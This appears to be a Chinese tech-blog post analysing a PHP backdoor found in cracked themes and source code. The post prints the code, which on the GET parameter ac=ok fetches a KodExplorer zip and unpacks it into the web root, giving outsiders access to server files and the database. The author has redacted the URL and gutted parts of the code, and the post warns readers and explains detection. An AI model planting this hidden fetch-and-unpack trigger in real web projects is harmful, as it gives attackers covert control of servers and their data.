• 保存到桌面加入收藏设为首页
经验分享

分析一段PHP的后门代码,很恶心

时间:2019-05-22 20:20:56   作者:234IT   来源:234IT   阅读:6187   评论:0
内容摘要:给大家分析一个简单的可以自己发现的PHP后门代码,这段代码存在与好多破解主题与源码中,我自己就至少发现了四五种。包括本站有人分享的源码中,也有这种代码。具体自己看下吧!先上代码[PHP]纯文本查看复制代码?0102030405060708091011121314151617181......

给大家分析一个简单的可以自己发现的PHP后门代码,这段代码存在与好多破解主题与源码中,我自己就至少发现了四五种。包括本站有人分享的源码中,也有这种代码。具体自己看下吧!

先上代码

if($_GET['ac']=="ok"){        echo 'OK';
    function downFile($url,$path){
        $arr=parse_url($url);
        $fileName=basename($arr['path']);
        $file=file_get_contents($url);
    }
    downFile("这里是网络下载地址,防止小人,直接删除这里的连接");
     
    class Unzip{
        public function __construct(){
            header("content-type:text/html;charset=utf8");
        }
        public function unzip($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true){
            if ($zip = zip_open($src_file)){
                if ($zip){
                    $splitter = ($create_zip_name_dir === true) ? "." : "/";
                    if($dest_dir === false){
                       
                    }
                    $this->create_dirs($dest_dir);
                    while ($zip_entry = zip_read($zip)){
                        $pos_last_slash = strrpos(zip_entry_name($zip_entry), "/");
                        if ($pos_last_slash !== false){
                            $this->create_dirs($dest_dir.substr(zip_entry_name($zip_entry), 0, $pos_last_slash+1));
                        }
                        if (zip_entry_open($zip,$zip_entry,"r")){
                            $file_name = $dest_dir.zip_entry_name($zip_entry);
                                if ($overwrite === true || $overwrite === false && !is_file($file_name)){
                                    $fstream = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
                                     
                                     
                                }
                            zip_entry_close($zip_entry);
                        }
                    }
                    zip_close($zip);
                }
            }else{
                return false;
            }
            return true;
        }
        public function create_dirs($path){
            if (!is_dir($path)){
                $directory_path = "";
                $directories = explode("/",$path);
                array_pop($directories);
                foreach($directories as $directory){
                    $directory_path .= $directory."/";
                    if (!is_dir($directory_path)){
                        mkdir($directory_path);
                        chmod($directory_path, 0777);
                    }
                }
            }
        }
    }
    $z = new Unzip();
    $z->unzip("kodexplorer4.39.zip",'./', true, false);


            以上代码是我发现的后门里面最简单的也是最贱的一个代码,当收到GET请求ac=ok时。会自动的下载kodexplorer4.39.zip,对你没看错,就是这货可道云。知道可道云的自然是知道这个代码是怎么工作的了。不知道的我给大家简单的解释一下吧,可道云是一个私有云系统,运行在虚拟主机和服务器下。当下载解压完之后这货就成了你的服务器后门。别人可以通过可道云查看你的服务器内容。可以下载你服务器的文件,并且连接数据库修改数据。


            是不是很简答?是不是很恶心?你杀毒都查不出这些东西!所以大家使用盗版的时候注意自己看下,中了招你都不知道怎么中的还以为是SQL注入修改的数据库。下面上图大家自己看一下吧。本地搭建的服务器写的代码测试的。大家有兴趣可以自己试试。


如果对你有用给个爱心啊,我要消除违规。还有奉劝那些知道后想做坏事的人啊,别干这么缺德的事。
由于怕有人拿走恶心人,代码修改了一部分,去掉了一些代码。想拿走给自己源码加后门的劝你们要点脸啊。


分析一段PHP的后门代码,很恶心

***********************************本站申明****************************************

234IT官方友情提示:

1、我们的官方网址是:http://www.234it.cn/
2、本站杜绝收费会员制!本站终身免费学习下载分享~
3、请勿轻信任何软件上或教程上收徒或其他服务项目,网络有风险!
4、本站软件需自行检测有无后门或病毒,如有恶意软件请于小编联系进行删除!
5、本站部分内容收集于互联网,如果有侵权内容、不妥之处,请联系我们删除。敬请谅解!

感谢大家一路的支持,有什么好的建议或者意见发至邮箱vipfengzivip@qq.com


免责声明:
234IT所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。


标签:代码  分析  一段  恶心  后门  

本站部分内容收集于互联网,如果有侵权内容、不妥之处,请联系我们删除。敬请谅解!

发邮件至:vipfengzivip@qq.com  

二三四网 ( 浙ICP备14041900号-12)
Powered by OTCMS V3.72